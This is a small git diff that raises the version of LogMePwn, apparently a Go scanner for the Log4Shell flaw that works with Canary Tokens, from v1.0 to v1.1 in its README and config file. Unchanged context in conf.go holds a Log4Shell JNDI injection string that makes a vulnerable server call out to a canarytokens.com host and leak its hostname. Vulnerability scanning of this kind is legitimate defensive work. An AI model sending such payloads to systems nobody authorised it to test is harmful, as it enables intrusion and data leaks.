diff --git a/README.md b/README.md index f619749..5351d43 100644 --- a/README.md +++ b/README.md @@ -15,7 +15,7 @@ $ ./lmp --help +---------------------+ | L o g M e P w n | - +---------------------+ v1.0 + +---------------------+ v1.1 ~ 0xInfection Usage: @@ -165,7 +165,7 @@ Which immediately triggered a few DNS lookups visible on the token history page Please add your comment to [this issue](https://github.com/0xInfection/LogMePwn/issues/1). ## License & Version -The tool is licensed under the GNU GPLv3. LogMePwn is currently at v1.0. +The tool is licensed under the GNU GPLv3. LogMePwn is currently at v1.1. ## Credits Shoutout to the team at [Thinkst Canary](https://canary.tools/) for their amazing Canary Tokens project. diff --git a/conf.go b/conf.go index 6b1fc81..7abaed8 100644 --- a/conf.go +++ b/conf.go @@ -75,7 +75,7 @@ type ( ) const ( - version = "v1.0" + version = "v1.1" letterBytes = "abcdefghijklmnopqrstuvwxyz0123456789" maxWorkers = 100 canaryTokenFormat = "${jndi:ldap://x${hostName}.L4J.%s.canarytokens.com/a}"